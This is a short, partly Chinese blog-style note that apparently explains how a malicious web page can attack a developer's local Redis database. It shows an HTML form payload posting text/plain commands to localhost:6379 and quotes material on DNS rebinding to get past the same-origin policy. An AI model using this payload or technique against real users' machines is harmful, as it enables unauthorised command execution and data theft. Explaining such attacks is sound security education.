How to steal developer''s local database

The HTML Form Protocol Attack

Using the enctype trick. (Ref - Paper - The HTML Form Protocol Attack)

<form enctype="text/plain" method="POST" action="http://localhost:6379">
<textarea name="abc">

SET abc 123
<input type="submit" value="Submit" />

当server接收到textarea中的内容后,将逐行运行。(Ref - The HTML Form Protocol Attack

不过While we can execute any command, we can’t actually retrieve the result. This is because of the browser’s same-origin policy, which ensures that reading data from a request to another domain is not possible. That’s where the second technique comes in!

DNS Rebinding

DNS rebinding attacks subvert the same-origin policy by confusing the browser into aggregating network resources controlled by distinct entities into one origin, effectively converting browsers into open proxies.

Using DNS rebinding, an attacker can circumvent firewalls to spider corporate intranets, exfiltrate sensitive documents, and compromise unpatched internal machines. An attacker can also hijack the IP address of innocent clients to send spam e-mail, commit click fraud, and frame clients for misdeeds.

DNS rebinding vulnerabilities permit the attacker to read and write directly on network sockets, subsuming the attacks possible with existing JavaScript-based botnets, which can send HTTP requests but cannot read back the responses.

Same-origin policy


  1. 目录不同,但是domain相同,所以符合同源规则,资源可以互相引用
  2. 由于端口不同,所以不符合同源规则
  3. 不同域名,所以不符合同源规则



Show Comments